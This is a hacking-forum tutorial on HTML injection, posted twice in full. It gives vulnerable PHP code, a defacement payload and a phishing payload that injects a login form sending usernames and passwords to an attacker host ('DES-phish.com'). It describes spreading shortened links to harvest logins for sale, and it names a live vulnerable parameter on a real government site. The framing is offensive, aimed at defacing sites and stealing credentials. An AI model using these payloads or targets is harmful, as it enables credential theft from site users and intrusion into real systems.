MERLINIANO
Member
- Thread Author
- #2
Making it clear that this is an advanced tutorial!
If you do not understand programming, first learn a language.
python language indication.
[HIDE] [0x01] HTML Injection:
Hypertext Markup Language (HTML) injection, also known as "virtual defacement" is an attack on an application when the user is allowed to inject HTML code into the web application through user input fields. When the web application is not able to properly handle requests from users, an attacker can supply his own valid HTML code via a parameter value and get the application to validate the request to the server. Sometimes HTML Injection is also referred as XSS HTML Injection because the two attacks are essentially the same thing but with an XSS attack you are sending Java script and script tags as an attack vector whereas in HTML injection you are using simple HTML tags to modify the page.
[0x02] Just Defacing?
Okay so in the hacker community many people underestimate the true danger of HTML Injection. Also attackers don't leverage the attack to its full potential rather than just editing the content of a page to say "I hacked you!". No defacing is just the tip of the ice burg here. HTML Injection can lead to malicious pages being created that may contain a hidden java drive by, phishing, distributed ddos attacks that are java based and run through the browser, distributed cracking attacks thats go own through your browser as your browsing the malicious site, Cross site scripting, hidden browser exploits, beef networks, hidden malware, bitcoin mining, and much much more. These are just some of the things that attackers never even think about doing because most are just unaware of how dangerous this attack can be. Scenario of this attack being leveraged correctly:
[*]Attacker finds HTML Injection Vulnerability on Social Network Site.
[*]Attacker crafts malicious link & encodes it, containing his HTML code, and sends it to users.
[*]User visits page, due to the domain being trusted.
[*]User Visits encoded link unaware, the link redirects to login page,
(phishing page that was crafted by attacker)
[*]User enters credentials and attacker grabs login info.
[*]Attacker now has potential to nab thousands of logins, sell to spammers, use passwords as word lists for effective cracking, and get a lot of rep.
[0x03] The Attack:
Vulnerable Application Code:
<?php
$username = $_REQUEST ['username'];
?>
<html>
<title>member search</title>
<h1>Welcome to CHF!</h1>
<br>
<body>
Searching For <?php echo $username; ?>!
</body>
</html>
[*]Sorry for the poor code, I didn't add a user input field but lets just imagine that there is a search box there used to enter a user name to search. So in the input field I enter "DES". The URL would look like this after I press the search button.
Code:
http://www.chf.com/membersearch.php?username=DES
[*]Lets look at our code. The page is called membersearch.php it requests the parameter 'username' so thats why the url has ?username= and whatever is entered in your input field is set as the $username variable then echoed (printed) back onto the page. So after my search for DES, the page should say Searching for DES!. This is good, this means that whatever is entered into our input field and set as the $username variable is printed onto the page. So how about trying to enter HTML code after our ?username= and see if the server validates it.
Hidden Content
Code:
http://www.chf.com/m...r><br><b>Hackedby DES</b>
[*]This will start two new lines and now have on our page in bold letters..
Code:
Searching for
Hacked by DES!
[0x04] Phishing Example:
Say In the above example I wanted to phish accounts. Well I would have to craft a link that will render the injected HTML, present a login form, and then comment out the rest of the page after the injection point with a <!-- to make it look a bit legit.
Code:
http://www.chf.com/m...name=<h3>PleaseEnter Your Username and Password to Proceed:</h3><form method="POST"
action="http://DES-phish.com....txt">Username:<input type="text" name="username" /><br />Password: <input type="password"
name="password" /><br /><input type="submit" value="Login" /></form><!--
[*]So now I encode this link, shorten it and then send it around the forum or web page to users. Then when user names and passwords are submitted to my phishing link, the values are sent to http://DES-phish.com/login.txt via POST and logged.
[0x05] Persistent and NON Persistent:
Just like XSS, HTML Injection can be persistent and NON persistent. Persistent HTML Injection being very rare. Persistent HTML Injection is achieved the same way persistent XSS is, by being able to submit your malicious code into the web page rather it just be stored via a link. This can be possible say in many guest books, or in places where you can leave a comment to a post or whatever. Just make sure that page is vulnerable, and send your malicious HTML code as a comment or post. So then all people have to do is visit the link and you can do phishing more effective or have users see your deface or whatever you use this attack for.
[0x06] Live Example:
HTML Injection on the National Geophysical Data Center. Even Large sites are vulnerable to this attack. (Also Vuln to XSS, & SQLI on same parameter.)
Code:
http://www.ngdc.noaa...=<b>DES@CHF</b>
[/HIDE]
If you do not understand programming, first learn a language.
python language indication.
[HIDE] [0x01] HTML Injection:
Hypertext Markup Language (HTML) injection, also known as "virtual defacement" is an attack on an application when the user is allowed to inject HTML code into the web application through user input fields. When the web application is not able to properly handle requests from users, an attacker can supply his own valid HTML code via a parameter value and get the application to validate the request to the server. Sometimes HTML Injection is also referred as XSS HTML Injection because the two attacks are essentially the same thing but with an XSS attack you are sending Java script and script tags as an attack vector whereas in HTML injection you are using simple HTML tags to modify the page.
[0x02] Just Defacing?
Okay so in the hacker community many people underestimate the true danger of HTML Injection. Also attackers don't leverage the attack to its full potential rather than just editing the content of a page to say "I hacked you!". No defacing is just the tip of the ice burg here. HTML Injection can lead to malicious pages being created that may contain a hidden java drive by, phishing, distributed ddos attacks that are java based and run through the browser, distributed cracking attacks thats go own through your browser as your browsing the malicious site, Cross site scripting, hidden browser exploits, beef networks, hidden malware, bitcoin mining, and much much more. These are just some of the things that attackers never even think about doing because most are just unaware of how dangerous this attack can be. Scenario of this attack being leveraged correctly:
[*]Attacker finds HTML Injection Vulnerability on Social Network Site.
[*]Attacker crafts malicious link & encodes it, containing his HTML code, and sends it to users.
[*]User visits page, due to the domain being trusted.
[*]User Visits encoded link unaware, the link redirects to login page,
(phishing page that was crafted by attacker)
[*]User enters credentials and attacker grabs login info.
[*]Attacker now has potential to nab thousands of logins, sell to spammers, use passwords as word lists for effective cracking, and get a lot of rep.
[0x03] The Attack:
Vulnerable Application Code:
<?php
$username = $_REQUEST ['username'];
?>
<html>
<title>member search</title>
<h1>Welcome to CHF!</h1>
<br>
<body>
Searching For <?php echo $username; ?>!
</body>
</html>
[*]Sorry for the poor code, I didn't add a user input field but lets just imagine that there is a search box there used to enter a user name to search. So in the input field I enter "DES". The URL would look like this after I press the search button.
Code:
http://www.chf.com/membersearch.php?username=DES
[*]Lets look at our code. The page is called membersearch.php it requests the parameter 'username' so thats why the url has ?username= and whatever is entered in your input field is set as the $username variable then echoed (printed) back onto the page. So after my search for DES, the page should say Searching for DES!. This is good, this means that whatever is entered into our input field and set as the $username variable is printed onto the page. So how about trying to enter HTML code after our ?username= and see if the server validates it.
Hidden Content
Code:
http://www.chf.com/m...r><br><b>Hackedby DES</b>
[*]This will start two new lines and now have on our page in bold letters..
Code:
Searching for
Hacked by DES!
[0x04] Phishing Example:
Say In the above example I wanted to phish accounts. Well I would have to craft a link that will render the injected HTML, present a login form, and then comment out the rest of the page after the injection point with a <!-- to make it look a bit legit.
Code:
http://www.chf.com/m...name=<h3>PleaseEnter Your Username and Password to Proceed:</h3><form method="POST"
action="http://DES-phish.com....txt">Username:<input type="text" name="username" /><br />Password: <input type="password"
name="password" /><br /><input type="submit" value="Login" /></form><!--
[*]So now I encode this link, shorten it and then send it around the forum or web page to users. Then when user names and passwords are submitted to my phishing link, the values are sent to http://DES-phish.com/login.txt via POST and logged.
[0x05] Persistent and NON Persistent:
Just like XSS, HTML Injection can be persistent and NON persistent. Persistent HTML Injection being very rare. Persistent HTML Injection is achieved the same way persistent XSS is, by being able to submit your malicious code into the web page rather it just be stored via a link. This can be possible say in many guest books, or in places where you can leave a comment to a post or whatever. Just make sure that page is vulnerable, and send your malicious HTML code as a comment or post. So then all people have to do is visit the link and you can do phishing more effective or have users see your deface or whatever you use this attack for.
[0x06] Live Example:
HTML Injection on the National Geophysical Data Center. Even Large sites are vulnerable to this attack. (Also Vuln to XSS, & SQLI on same parameter.)
Code:
http://www.ngdc.noaa...=<b>DES@CHF</b>
[/HIDE]
Do not trust, Check.